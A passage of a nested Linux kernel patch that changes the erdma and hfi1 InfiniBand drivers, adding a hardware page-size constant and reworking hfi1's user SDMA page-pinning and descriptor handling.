+ 
++/* Hardware page size definition */
++#define ERDMA_HW_PAGE_SHIFT 12
++#define ERDMA_HW_PAGE_SIZE 4096
++
+ /* WQE related. */
+ #define EQE_SIZE 16
+ #define EQE_SHIFT 4
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.c b/drivers/infiniband/hw/erdma/erdma_verbs.c
+index 9c30d78730aa1..83e1b0d559771 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.c
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.c
+@@ -38,7 +38,7 @@ static int create_qp_cmd(struct erdma_dev *dev, struct erdma_qp *qp)
+ 		   FIELD_PREP(ERDMA_CMD_CREATE_QP_PD_MASK, pd->pdn);
+ 
+ 	if (rdma_is_kernel_res(&qp->ibqp.res)) {
+-		u32 pgsz_range = ilog2(SZ_1M) - PAGE_SHIFT;
++		u32 pgsz_range = ilog2(SZ_1M) - ERDMA_HW_PAGE_SHIFT;
+ 
+ 		req.sq_cqn_mtt_cfg =
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+@@ -66,13 +66,13 @@ static int create_qp_cmd(struct erdma_dev *dev, struct erdma_qp *qp)
+ 		user_qp = &qp->user_qp;
+ 		req.sq_cqn_mtt_cfg = FIELD_PREP(
+ 			ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+-			ilog2(user_qp->sq_mtt.page_size) - PAGE_SHIFT);
++			ilog2(user_qp->sq_mtt.page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.sq_cqn_mtt_cfg |=
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_CQN_MASK, qp->scq->cqn);
+ 
+ 		req.rq_cqn_mtt_cfg = FIELD_PREP(
+ 			ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+-			ilog2(user_qp->rq_mtt.page_size) - PAGE_SHIFT);
++			ilog2(user_qp->rq_mtt.page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.rq_cqn_mtt_cfg |=
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_CQN_MASK, qp->rcq->cqn);
+ 
+@@ -162,7 +162,7 @@ static int create_cq_cmd(struct erdma_dev *dev, struct erdma_cq *cq)
+ 	if (rdma_is_kernel_res(&cq->ibcq.res)) {
+ 		page_size = SZ_32M;
+ 		req.cfg0 |= FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
+-				       ilog2(page_size) - PAGE_SHIFT);
++				       ilog2(page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.qbuf_addr_l = lower_32_bits(cq->kern_cq.qbuf_dma_addr);
+ 		req.qbuf_addr_h = upper_32_bits(cq->kern_cq.qbuf_dma_addr);
+ 
+@@ -175,8 +175,9 @@ static int create_cq_cmd(struct erdma_dev *dev, struct erdma_cq *cq)
+ 			cq->kern_cq.qbuf_dma_addr + (cq->depth << CQE_SHIFT);
+ 	} else {
+ 		mtt = &cq->user_cq.qbuf_mtt;
+-		req.cfg0 |= FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
+-				       ilog2(mtt->page_size) - PAGE_SHIFT);
++		req.cfg0 |=
++			FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
++				   ilog2(mtt->page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		if (mtt->mtt_nents == 1) {
+ 			req.qbuf_addr_l = lower_32_bits(*(u64 *)mtt->mtt_buf);
+ 			req.qbuf_addr_h = upper_32_bits(*(u64 *)mtt->mtt_buf);
+@@ -636,7 +637,7 @@ static int init_user_qp(struct erdma_qp *qp, struct erdma_ucontext *uctx,
+ 	u32 rq_offset;
+ 	int ret;
+ 
+-	if (len < (PAGE_ALIGN(qp->attrs.sq_size * SQEBB_SIZE) +
++	if (len < (ALIGN(qp->attrs.sq_size * SQEBB_SIZE, ERDMA_HW_PAGE_SIZE) +
+ 		   qp->attrs.rq_size * RQE_SIZE))
+ 		return -EINVAL;
+ 
+@@ -646,7 +647,7 @@ static int init_user_qp(struct erdma_qp *qp, struct erdma_ucontext *uctx,
+ 	if (ret)
+ 		return ret;
+ 
+-	rq_offset = PAGE_ALIGN(qp->attrs.sq_size << SQEBB_SHIFT);
++	rq_offset = ALIGN(qp->attrs.sq_size << SQEBB_SHIFT, ERDMA_HW_PAGE_SIZE);
+ 	qp->user_qp.rq_offset = rq_offset;
+ 
+ 	ret = get_mtt_entries(qp->dev, &qp->user_qp.rq_mtt, va + rq_offset,
+diff --git a/drivers/infiniband/hw/hfi1/ipoib_tx.c b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+index 5d9a7b09ca37e..8973a081d641e 100644
+--- a/drivers/infiniband/hw/hfi1/ipoib_tx.c
++++ b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+@@ -215,6 +215,7 @@ static int hfi1_ipoib_build_ulp_payload(struct ipoib_txreq *tx,
+ 		const skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
+ 
+ 		ret = sdma_txadd_page(dd,
++				      NULL,
+ 				      txreq,
+ 				      skb_frag_page(frag),
+ 				      frag->bv_offset,
+@@ -737,10 +738,13 @@ int hfi1_ipoib_txreq_init(struct hfi1_ipoib_dev_priv *priv)
+ 		txq->tx_ring.shift = ilog2(tx_item_size);
+ 		txq->tx_ring.avail = hfi1_ipoib_ring_hwat(txq);
+ 		tx_ring = &txq->tx_ring;
+-		for (j = 0; j < tx_ring_size; j++)
++		for (j = 0; j < tx_ring_size; j++) {
+ 			hfi1_txreq_from_idx(tx_ring, j)->sdma_hdr =
+ 				kzalloc_node(sizeof(*tx->sdma_hdr),
+ 					     GFP_KERNEL, priv->dd->node);
++			if (!hfi1_txreq_from_idx(tx_ring, j)->sdma_hdr)
++				goto free_txqs;
++		}
+ 
+ 		netif_napi_add_tx(dev, &txq->napi, hfi1_ipoib_poll_tx_ring);
+ 	}
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.c b/drivers/infiniband/hw/hfi1/mmu_rb.c
+index 7333646021bb8..71b9ac0188875 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.c
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.c
+@@ -126,11 +126,11 @@ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 	spin_lock_irqsave(&handler->lock, flags);
+ 	node = __mmu_rb_search(handler, mnode->addr, mnode->len);
+ 	if (node) {
+-		ret = -EINVAL;
++		ret = -EEXIST;
+ 		goto unlock;
+ 	}
+ 	__mmu_int_rb_insert(mnode, &handler->root);
+-	list_add(&mnode->list, &handler->lru_list);
++	list_add_tail(&mnode->list, &handler->lru_list);
+ 
+ 	ret = handler->ops->insert(handler->ops_arg, mnode);
+ 	if (ret) {
+@@ -143,6 +143,19 @@ unlock:
+ 	return ret;
+ }
+ 
++/* Caller must hold handler lock */
++struct mmu_rb_node *hfi1_mmu_rb_get_first(struct mmu_rb_handler *handler,
++					  unsigned long addr, unsigned long len)
++{
++	struct mmu_rb_node *node;
++
++	trace_hfi1_mmu_rb_search(addr, len);
++	node = __mmu_int_rb_iter_first(&handler->root, addr, (addr + len) - 1);
++	if (node)
++		list_move_tail(&node->list, &handler->lru_list);
++	return node;
++}
++
+ /* Caller must hold handler lock */
+ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *handler,
+ 					   unsigned long addr,
+@@ -167,32 +180,6 @@ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *handler,
+ 	return node;
+ }
+ 
+-bool hfi1_mmu_rb_remove_unless_exact(struct mmu_rb_handler *handler,
+-				     unsigned long addr, unsigned long len,
+-				     struct mmu_rb_node **rb_node)
+-{
+-	struct mmu_rb_node *node;
+-	unsigned long flags;
+-	bool ret = false;
+-
+-	if (current->mm != handler->mn.mm)
+-		return ret;
+-
+-	spin_lock_irqsave(&handler->lock, flags);
+-	node = __mmu_rb_search(handler, addr, len);
+-	if (node) {
+-		if (node->addr == addr && node->len == len)
+-			goto unlock;
+-		__mmu_int_rb_remove(node, &handler->root);
+-		list_del(&node->list); /* remove from LRU list */
+-		ret = true;
+-	}
+-unlock:
+-	spin_unlock_irqrestore(&handler->lock, flags);
+-	*rb_node = node;
+-	return ret;
+-}
+-
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ {
+ 	struct mmu_rb_node *rbnode, *ptr;
+@@ -206,8 +193,7 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 	INIT_LIST_HEAD(&del_list);
+ 
+ 	spin_lock_irqsave(&handler->lock, flags);
+-	list_for_each_entry_safe_reverse(rbnode, ptr, &handler->lru_list,
+-					 list) {
++	list_for_each_entry_safe(rbnode, ptr, &handler->lru_list, list) {
+ 		if (handler->ops->evict(handler->ops_arg, rbnode, evict_arg,
+ 					&stop)) {
+ 			__mmu_int_rb_remove(rbnode, &handler->root);
+@@ -219,36 +205,11 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 	}
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	while (!list_empty(&del_list)) {
+-		rbnode = list_first_entry(&del_list, struct mmu_rb_node, list);
+-		list_del(&rbnode->list);
++	list_for_each_entry_safe(rbnode, ptr, &del_list, list) {
+ 		handler->ops->remove(handler->ops_arg, rbnode);
+ 	}
+ }
+ 
+-/*
+- * It is up to the caller to ensure that this function does not race with the
+- * mmu invalidate notifier which may be calling the users remove callback on
+- * 'node'.
+- */
+-void hfi1_mmu_rb_remove(struct mmu_rb_handler *handler,
+-			struct mmu_rb_node *node)
+-{
+-	unsigned long flags;
+-
+-	if (current->mm != handler->mn.mm)
+-		return;
+-
+-	/* Validity of handler and node pointers has been checked by caller. */
+-	trace_hfi1_mmu_rb_remove(node->addr, node->len);
+-	spin_lock_irqsave(&handler->lock, flags);
+-	__mmu_int_rb_remove(node, &handler->root);
+-	list_del(&node->list); /* remove from LRU list */
+-	spin_unlock_irqrestore(&handler->lock, flags);
+-
+-	handler->ops->remove(handler->ops_arg, node);
+-}
+-
+ static int mmu_notifier_range_start(struct mmu_notifier *mn,
+ 		const struct mmu_notifier_range *range)
+ {
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.h b/drivers/infiniband/hw/hfi1/mmu_rb.h
+index 7417be2b9dc8a..ed75acdb7b839 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.h
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.h
+@@ -52,10 +52,8 @@ void hfi1_mmu_rb_unregister(struct mmu_rb_handler *handler);
+ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 		       struct mmu_rb_node *mnode);
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg);
+-void hfi1_mmu_rb_remove(struct mmu_rb_handler *handler,
+-			struct mmu_rb_node *mnode);
+-bool hfi1_mmu_rb_remove_unless_exact(struct mmu_rb_handler *handler,
+-				     unsigned long addr, unsigned long len,
+-				     struct mmu_rb_node **rb_node);
++struct mmu_rb_node *hfi1_mmu_rb_get_first(struct mmu_rb_handler *handler,
++					  unsigned long addr,
++					  unsigned long len);
+ 
+ #endif /* _HFI1_MMU_RB_H */
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index 8ed20392e9f0d..bb2552dd29c1e 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -1593,22 +1593,7 @@ static inline void sdma_unmap_desc(
+ 	struct hfi1_devdata *dd,
+ 	struct sdma_desc *descp)
+ {
+-	switch (sdma_mapping_type(descp)) {
+-	case SDMA_MAP_SINGLE:
+-		dma_unmap_single(
+-			&dd->pcidev->dev,
+-			sdma_mapping_addr(descp),
+-			sdma_mapping_len(descp),
+-			DMA_TO_DEVICE);
+-		break;
+-	case SDMA_MAP_PAGE:
+-		dma_unmap_page(
+-			&dd->pcidev->dev,
+-			sdma_mapping_addr(descp),
+-			sdma_mapping_len(descp),
+-			DMA_TO_DEVICE);
+-		break;
+-	}
++	system_descriptor_complete(dd, descp);
+ }
+ 
+ /*
+@@ -3128,7 +3113,7 @@ int ext_coal_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx,
+ 
+ 		/* Add descriptor for coalesce buffer */
+ 		tx->desc_limit = MAX_DESC;
+-		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, tx,
++		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx,
+ 					 addr, tx->tlen);
+ 	}
+ 
+@@ -3167,10 +3152,12 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ 			return rval;
+ 		}
+ 	}
++
+ 	/* finish the one just added */
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		SDMA_MAP_NONE,
++		NULL,
+ 		dd->sdma_pad_phys,
+ 		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)));
+ 	tx->num_desc++;
+diff --git a/drivers/infiniband/hw/hfi1/sdma.h b/drivers/infiniband/hw/hfi1/sdma.h
+index b023fc461bd51..95aaec14c6c28 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.h
++++ b/drivers/infiniband/hw/hfi1/sdma.h
+@@ -594,6 +594,7 @@ static inline dma_addr_t sdma_mapping_addr(struct sdma_desc *d)
+ static inline void make_tx_sdma_desc(
+ 	struct sdma_txreq *tx,
+ 	int type,
++	void *pinning_ctx,
+ 	dma_addr_t addr,
+ 	size_t len)
+ {
+@@ -612,6 +613,7 @@ static inline void make_tx_sdma_desc(
+ 				<< SDMA_DESC0_PHY_ADDR_SHIFT) |
+ 			(((u64)len & SDMA_DESC0_BYTE_COUNT_MASK)
+ 				<< SDMA_DESC0_BYTE_COUNT_SHIFT);
++	desc->pinning_ctx = pinning_ctx;
+ }
+ 
+ /* helper to extend txreq */
+@@ -643,6 +645,7 @@ static inline void _sdma_close_tx(struct hfi1_devdata *dd,
+ static inline int _sdma_txadd_daddr(
+ 	struct hfi1_devdata *dd,
+ 	int type,
++	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	dma_addr_t addr,
+ 	u16 len)
+@@ -652,6 +655,7 @@ static inline int _sdma_txadd_daddr(
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		type,
++		pinning_ctx,
+ 		addr, len);
+ 	WARN_ON(len > tx->tlen);
+ 	tx->num_desc++;
+@@ -672,6 +676,7 @@ static inline int _sdma_txadd_daddr(
+ /**
+  * sdma_txadd_page() - add a page to the sdma_txreq
+  * @dd: the device to use for mapping
++ * @pinning_ctx: context to be released at descriptor retirement
+  * @tx: tx request to which the page is added
+  * @page: page to map
+  * @offset: offset within the page
+@@ -687,6 +692,7 @@ static inline int _sdma_txadd_daddr(
+  */
+ static inline int sdma_txadd_page(
+ 	struct hfi1_devdata *dd,
++	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	struct page *page,
+ 	unsigned long offset,
+@@ -714,8 +720,7 @@ static inline int sdma_txadd_page(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(
+-			dd, SDMA_MAP_PAGE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_PAGE, pinning_ctx, tx, addr, len);
+ }
+ 
+ /**
+@@ -749,7 +754,8 @@ static inline int sdma_txadd_daddr(
+ 			return rval;
+ 	}
+ 
+-	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, NULL, tx,
++				 addr, len);
+ }
+ 
+ /**
+@@ -795,8 +801,7 @@ static inline int sdma_txadd_kvaddr(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(
+-			dd, SDMA_MAP_SINGLE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx, addr, len);
+ }
+ 
+ struct iowait_work;
+@@ -1030,4 +1035,5 @@ extern uint mod_num_sdma;
+ 
+ void sdma_update_lmc(struct hfi1_devdata *dd, u64 mask, u32 lid);
+ 
++void system_descriptor_complete(struct hfi1_devdata *dd, struct sdma_desc *descp);
+ #endif
+diff --git a/drivers/infiniband/hw/hfi1/sdma_txreq.h b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+index e262fb5c5ec61..fad946cb5e0d8 100644
+--- a/drivers/infiniband/hw/hfi1/sdma_txreq.h
++++ b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+@@ -19,6 +19,7 @@
+ struct sdma_desc {
+ 	/* private:  don't use directly */
+ 	u64 qw[2];
++	void *pinning_ctx;
+ };
+ 
+ /**
+diff --git a/drivers/infiniband/hw/hfi1/trace_mmu.h b/drivers/infiniband/hw/hfi1/trace_mmu.h
+index 187e9244fe5ed..57900ebb7702e 100644
+--- a/drivers/infiniband/hw/hfi1/trace_mmu.h
++++ b/drivers/infiniband/hw/hfi1/trace_mmu.h
+@@ -37,10 +37,6 @@ DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_rb_search,
+ 	     TP_PROTO(unsigned long addr, unsigned long len),
+ 	     TP_ARGS(addr, len));
+ 
+-DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_rb_remove,
+-	     TP_PROTO(unsigned long addr, unsigned long len),
+-	     TP_ARGS(addr, len));
+-
+ DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_mem_invalidate,
+ 	     TP_PROTO(unsigned long addr, unsigned long len),
+ 	     TP_ARGS(addr, len));
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.c b/drivers/infiniband/hw/hfi1/user_sdma.c
+index a71c5a36cebab..ae58b48afe074 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.c
++++ b/drivers/infiniband/hw/hfi1/user_sdma.c
+@@ -24,7 +24,6 @@
+ 
+ #include "hfi.h"
+ #include "sdma.h"
+-#include "mmu_rb.h"
+ #include "user_sdma.h"
+ #include "verbs.h"  /* for the headers */
+ #include "common.h" /* for struct hfi1_tid_info */
+@@ -39,11 +38,7 @@ static unsigned initial_pkt_count = 8;
+ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts);
+ static void user_sdma_txreq_cb(struct sdma_txreq *txreq, int status);
+ static inline void pq_update(struct hfi1_user_sdma_pkt_q *pq);
+-static void user_sdma_free_request(struct user_sdma_request *req, bool unpin);
+-static int pin_vector_pages(struct user_sdma_request *req,
+-			    struct user_sdma_iovec *iovec);
+-static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
+-			       unsigned start, unsigned npages);
++static void user_sdma_free_request(struct user_sdma_request *req);
+ static int check_header_template(struct user_sdma_request *req,
+ 				 struct hfi1_pkt_header *hdr, u32 lrhlen,
+ 				 u32 datalen);
+@@ -81,6 +76,11 @@ static struct mmu_rb_ops sdma_rb_ops = {
+ 	.invalidate = sdma_rb_invalidate
+ };
+ 
++static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   u32 *pkt_remaining);
++
+ static int defer_packet_queue(
+ 	struct sdma_engine *sde,
+ 	struct iowait_work *wait,
+@@ -410,6 +410,7 @@ int hfi1_user_sdma_process_request(struct hfi1_filedata *fd,
+ 		ret = -EINVAL;
+ 		goto free_req;
+ 	}
++
+ 	/* Copy the header from the user buffer */
+ 	ret = copy_from_user(&req->hdr, iovec[idx].iov_base + sizeof(info),
+ 			     sizeof(req->hdr));
+@@ -484,9 +485,8 @@ int hfi1_user_sdma_process_request(struct hfi1_filedata *fd,
+ 		memcpy(&req->iovs[i].iov,
+ 		       iovec + idx++,
+ 		       sizeof(req->iovs[i].iov));
+-		ret = pin_vector_pages(req, &req->iovs[i]);
+-		if (ret) {
+-			req->data_iovs = i;
++		if (req->iovs[i].iov.iov_len == 0) {
++			ret = -EINVAL;
+ 			goto free_req;
+ 		}
+ 		req->data_len += req->iovs[i].iov.iov_len;
+@@ -584,7 +584,7 @@ free_req:
+ 		if (req->seqsubmitted)
+ 			wait_event(pq->busy.wait_dma,
+ 				   (req->seqcomp == req->seqsubmitted - 1));
+-		user_sdma_free_request(req, true);
++		user_sdma_free_request(req);
+ 		pq_update(pq);
+ 		set_comp_state(pq, cq, info.comp_idx, ERROR, ret);
+ 	}
+@@ -696,48 +696,6 @@ static int user_sdma_txadd_ahg(struct user_sdma_request *req,
+ 	return ret;
+ }
+ 
+-static int user_sdma_txadd(struct user_sdma_request *req,
+-			   struct user_sdma_txreq *tx,
+-			   struct user_sdma_iovec *iovec, u32 datalen,
+-			   u32 *queued_ptr, u32 *data_sent_ptr,
+-			   u64 *iov_offset_ptr)
+-{
+-	int ret;
+-	unsigned int pageidx, len;
+-	unsigned long base, offset;
+-	u64 iov_offset = *iov_offset_ptr;
+-	u32 queued = *queued_ptr, data_sent = *data_sent_ptr;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-
+-	base = (unsigned long)iovec->iov.iov_base;
+-	offset = offset_in_page(base + iovec->offset + iov_offset);
+-	pageidx = (((iovec->offset + iov_offset + base) - (base & PAGE_MASK)) >>
+-		   PAGE_SHIFT);
+-	len = offset + req->info.fragsize > PAGE_SIZE ?
+-		PAGE_SIZE - offset : req->info.fragsize;
+-	len = min((datalen - queued), len);
+-	ret = sdma_txadd_page(pq->dd, &tx->txreq, iovec->pages[pageidx],
+-			      offset, len);
+-	if (ret) {
+-		SDMA_DBG(req, "SDMA txreq add page failed %d\n", ret);
+-		return ret;
+-	}
+-	iov_offset += len;
+-	queued += len;
+-	data_sent += len;
+-	if (unlikely(queued < datalen && pageidx == iovec->npages &&
+-		     req->iov_idx < req->data_iovs - 1)) {
+-		iovec->offset += iov_offset;
+-		iovec = &req->iovs[++req->iov_idx];
+-		iov_offset = 0;
+-	}
+-
+-	*queued_ptr = queued;
+-	*data_sent_ptr = data_sent;
+-	*iov_offset_ptr = iov_offset;
+-	return ret;
+-}
+-
+ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ {
+ 	int ret = 0;
+@@ -769,8 +727,7 @@ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ 		maxpkts = req->info.npkts - req->seqnum;
+ 
+ 	while (npkts < maxpkts) {
+-		u32 datalen = 0, queued = 0, data_sent = 0;
+-		u64 iov_offset = 0;
++		u32 datalen = 0;
+ 
+ 		/*
+ 		 * Check whether any of the completions have come back
+@@ -863,27 +820,17 @@ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ 				goto free_txreq;
+ 		}
+ 
+-		/*
+-		 * If the request contains any data vectors, add up to
+-		 * fragsize bytes to the descriptor.
+-		 */
+-		while (queued < datalen &&
+-		       (req->sent + data_sent) < req->data_len) {
+-			ret = user_sdma_txadd(req, tx, iovec, datalen,
+-					      &queued, &data_sent, &iov_offset);
+-			if (ret)
+-				goto free_txreq;
+-		}
+-		/*
+-		 * The txreq was submitted successfully so we can update
+-		 * the counters.
+-		 */
+ 		req->koffset += datalen;
+ 		if (req_opcode(req->info.ctrl) == EXPECTED)
+ 			req->tidoffset += datalen;
+-		req->sent += data_sent;
+-		if (req->data_len)
+-			iovec->offset += iov_offset;
++		req->sent += datalen;
++		while (datalen) {
++			ret = add_system_pages_to_sdma_packet(req, tx, iovec,
++							      &datalen);
++			if (ret)
++				goto free_txreq;
++			iovec = &req->iovs[req->iov_idx];
++		}
+ 		list_add_tail(&tx->txreq.list, &req->txps);
+ 		/*
+ 		 * It is important to increment this here as it is used to
+@@ -920,133 +867,14 @@ free_tx:
+ static u32 sdma_cache_evict(struct hfi1_user_sdma_pkt_q *pq, u32 npages)
+ {
+ 	struct evict_data evict_data;
++	struct mmu_rb_handler *handler = pq->handler;
+ 
+ 	evict_data.cleared = 0;
+ 	evict_data.target = npages;
+-	hfi1_mmu_rb_evict(pq->handler, &evict_data);
++	hfi1_mmu_rb_evict(handler, &evict_data);
+ 	return evict_data.cleared;
+ }
+ 
+-static int pin_sdma_pages(struct user_sdma_request *req,
+-			  struct user_sdma_iovec *iovec,
+-			  struct sdma_mmu_node *node,
+-			  int npages)
+-{
+-	int pinned, cleared;
+-	struct page **pages;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-
+-	pages = kcalloc(npages, sizeof(*pages), GFP_KERNEL);
+-	if (!pages)
+-		return -ENOMEM;
+-	memcpy(pages, node->pages, node->npages * sizeof(*pages));
+-
+-	npages -= node->npages;
+-retry:
+-	if (!hfi1_can_pin_pages(pq->dd, current->mm,
+-				atomic_read(&pq->n_locked), npages)) {
+-		cleared = sdma_cache_evict(pq, npages);
+-		if (cleared >= npages)
+-			goto retry;
+-	}
+-	pinned = hfi1_acquire_user_pages(current->mm,
+-					 ((unsigned long)iovec->iov.iov_base +
+-					 (node->npages * PAGE_SIZE)), npages, 0,
+-					 pages + node->npages);
+-	if (pinned < 0) {
+-		kfree(pages);
+-		return pinned;
+-	}
+-	if (pinned != npages) {
+-		unpin_vector_pages(current->mm, pages, node->npages, pinned);
+-		return -EFAULT;
+-	}
+-	kfree(node->pages);
+-	node->rb.len = iovec->iov.iov_len;
+-	node->pages = pages;
+-	atomic_add(pinned, &pq->n_locked);
+-	return pinned;
+-}
+-
+-static void unpin_sdma_pages(struct sdma_mmu_node *node)
+-{
+-	if (node->npages) {
+-		unpin_vector_pages(mm_from_sdma_node(node), node->pages, 0,
+-				   node->npages);
+-		atomic_sub(node->npages, &node->pq->n_locked);
+-	}
+-}
+-
+-static int pin_vector_pages(struct user_sdma_request *req,
+-			    struct user_sdma_iovec *iovec)
+-{
+-	int ret = 0, pinned, npages;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-	struct sdma_mmu_node *node = NULL;
+-	struct mmu_rb_node *rb_node;
+-	struct iovec *iov;
+-	bool extracted;
+-
+-	extracted =
+-		hfi1_mmu_rb_remove_unless_exact(pq->handler,
+-						(unsigned long)
+-						iovec->iov.iov_base,
+-						iovec->iov.iov_len, &rb_node);
+-	if (rb_node) {
+-		node = container_of(rb_node, struct sdma_mmu_node, rb);
+-		if (!extracted) {
+-			atomic_inc(&node->refcount);
+-			iovec->pages = node->pages;
+-			iovec->npages = node->npages;
+-			iovec->node = node;
+-			return 0;
+-		}
+-	}
+-
+-	if (!node) {
+-		node = kzalloc(sizeof(*node), GFP_KERNEL);
+-		if (!node)
+-			return -ENOMEM;
+-
+-		node->rb.addr = (unsigned long)iovec->iov.iov_base;
+-		node->pq = pq;
+-		atomic_set(&node->refcount, 0);
+-	}
+-
+-	iov = &iovec->iov;
+-	npages = num_user_pages((unsigned long)iov->iov_base, iov->iov_len);
+-	if (node->npages < npages) {
+-		pinned = pin_sdma_pages(req, iovec, node, npages);
+-		if (pinned < 0) {
+-			ret = pinned;
+-			goto bail;
+-		}
+-		node->npages += pinned;
+-		npages = node->npages;
+-	}
+-	iovec->pages = node->pages;
+-	iovec->npages = npages;
+-	iovec->node = node;
+-
+-	ret = hfi1_mmu_rb_insert(req->pq->handler, &node->rb);
+-	if (ret) {
+-		iovec->node = NULL;
+-		goto bail;
+-	}
+-	return 0;
+-bail:
+-	unpin_sdma_pages(node);
+-	kfree(node);
+-	return ret;
+-}
+-
+-static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
+-			       unsigned start, unsigned npages)
+-{
+-	hfi1_release_user_pages(mm, pages + start, npages, false);
+-	kfree(pages);
+-}
+-
+ static int check_header_template(struct user_sdma_request *req,
+ 				 struct hfi1_pkt_header *hdr, u32 lrhlen,
+ 				 u32 datalen)
+@@ -1388,7 +1216,7 @@ static void user_sdma_txreq_cb(struct sdma_txreq *txreq, int status)
+ 	if (req->seqcomp != req->info.npkts - 1)
+ 		return;
+ 
+-	user_sdma_free_request(req, false);
++	user_sdma_free_request(req);
+ 	set_comp_state(pq, cq, req->info.comp_idx, state, status);
+ 	pq_update(pq);
+ }
+@@ -1399,10 +1227,8 @@ static inline void pq_update(struct hfi1_user_sdma_pkt_q *pq)
+ 		wake_up(&pq->wait);
+ }
+ 
+-static void user_sdma_free_request(struct user_sdma_request *req, bool unpin)
++static void user_sdma_free_request(struct user_sdma_request *req)
+ {
+-	int i;
+-
+ 	if (!list_empty(&req->txps)) {
+ 		struct sdma_txreq *t, *p;
+ 
+@@ -1415,21 +1241,6 @@ static void user_sdma_free_request(struct user_sdma_request *req, bool unpin)
+ 		}
+ 	}
+ 
+-	for (i = 0; i < req->data_iovs; i++) {
+-		struct sdma_mmu_node *node = req->iovs[i].node;
+-
+-		if (!node)
+-			continue;
+-
+-		req->iovs[i].node = NULL;
+-
+-		if (unpin)
+-			hfi1_mmu_rb_remove(req->pq->handler,
+-					   &node->rb);
+-		else
+-			atomic_dec(&node->refcount);
+-	}
+-
+ 	kfree(req->tids);
+ 	clear_bit(req->info.comp_idx, req->pq->req_in_use);
+ }
+@@ -1447,6 +1258,368 @@ static inline void set_comp_state(struct hfi1_user_sdma_pkt_q *pq,
+ 					idx, state, ret);
+ }
+ 
++static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
++			       unsigned int start, unsigned int npages)
++{
++	hfi1_release_user_pages(mm, pages + start, npages, false);
++	kfree(pages);
++}
++
++static void free_system_node(struct sdma_mmu_node *node)
++{
++	if (node->npages) {
++		unpin_vector_pages(mm_from_sdma_node(node), node->pages, 0,
++				   node->npages);
++		atomic_sub(node->npages, &node->pq->n_locked);
++	}
++	kfree(node);
++}
++
++static inline void acquire_node(struct sdma_mmu_node *node)
++{
++	atomic_inc(&node->refcount);
